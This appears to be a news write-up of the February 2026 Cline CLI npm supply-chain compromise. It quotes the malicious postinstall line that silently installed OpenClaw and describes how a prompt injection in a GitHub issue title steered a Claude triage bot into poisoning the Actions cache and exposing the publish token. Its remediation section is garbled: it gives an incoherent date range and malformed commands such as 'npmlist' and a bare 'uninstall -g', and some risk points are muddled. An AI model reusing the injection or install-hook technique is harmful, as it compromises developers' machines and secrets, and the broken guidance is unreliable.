On February 17, 2026, at 3:26 AM PT, an unauthorized actor used a compromised npm publish token to release version 2.3.0 of the popular AI-powered coding assistant Cline CLI. The update quietly added a single malicious line to package.json:
"postinstall": "npm install -g openclaw@latest"
This caused OpenClaw , the fast-rising open-source autonomous AI agent platform , to install automatically on any developer's machine that pulled the compromised version. The attack window lasted roughly eight hours (until maintainers revoked the token and yanked 2.3.0 around 11:30 AM PT). During that time, the package was downloaded approximately 4,000 times, per StepSecurity telemetry.
Cline maintainers quickly released 2.4.0, deprecated 2.3.0, revoked the stolen token, and switched npm publishing to OpenID Connect (OIDC) via GitHub Actions to prevent future token-based compromises. Importantly, the Cline VS Code extension and JetBrains plugin were unaffected , the breach was limited to the CLI package.
How the Attack Happened (Clinejection)
Security researcher Adnan Khan previously disclosed a vulnerability in Cline's GitHub Actions workflow, dubbed Clinejection (building on PromptPwnd techniques). The workflow used Claude to automatically triage incoming issues, granting the AI broad repository access and tools — including the ability to run arbitrary code in the default branch.
An attacker could exploit this via prompt injection in a GitHub issue title, tricking Claude into:
1. Filling the GitHub Actions cache with >10 GB of junk data (triggering LRU eviction).
2. Poisoning cache entries that matched keys used by the nightly release workflow.
3. Waiting for the nightly publish job to run (~2 AM UTC) and execute from the poisoned cache.
This gave code execution in the publish workflow , enough to steal the NPM_RELEASE_TOKEN (or NPM_TOKEN), which had full production publishing rights. The attacker then used that token to push the malicious 2.3.0 update.
Microsoft Threat Intelligence observed a "small but noticeable uptick" in OpenClaw installations on February 17, confirming the compromise had real impact.
Risk Assessment
Endor Labs researcher Henrik Plate noted the overall impact is low:
1. OpenClaw itself is not malicious (it's a legitimate, popular open-source project).
2. The postinstall only installs OpenClaw , no additional malicious behavior was observed.
3. No evidence the Gateway daemon (the part that could expose remote access) was started automatically.
Still, the incident is a serious wake-up call for AI supply chain security:
1. Developers are integrating AI agents such as OpenClaw into their workflow, but if the AI steals creative works, developer would be exposed to impersonation and data loss.
2. Automated Triage Workflows (AWS) that involve AI are privileging the actor who has injected a command into the system since the command becomes rooted at the request, thus allowing automated exploitation of production secrets.
3. npm is a high value target; standard tokens are weak.
What Users Should Do Now
1. Check to see if you have installed cline@2.3.0 between 03-26 and 02-17-2026: npmlist -g cline or check package-lock.json /yarn.lock.
2. If yes , update to cline@2.4.0 and uninstall openclaw if unwarranted – uninstall -g openclaw.
3. Check your environment for the presence of openclaw instances (or its invoked processes).
4. Rotate all npm tokens where they are exposed and enable CI/CD package publishing with OIDC (OpenID Connect) on all packages that you are maintaining.
5. For teams- scan CI/CD logs for out of the ordinary interaction with issues and poison caches with their requests.
This is a textbook example of how AI-assisted development workflows can become attack surfaces and why trusted publishing (OIDC), least-privilege automation, and supply-chain attestations are no longer optional.
Source: The Hacker News
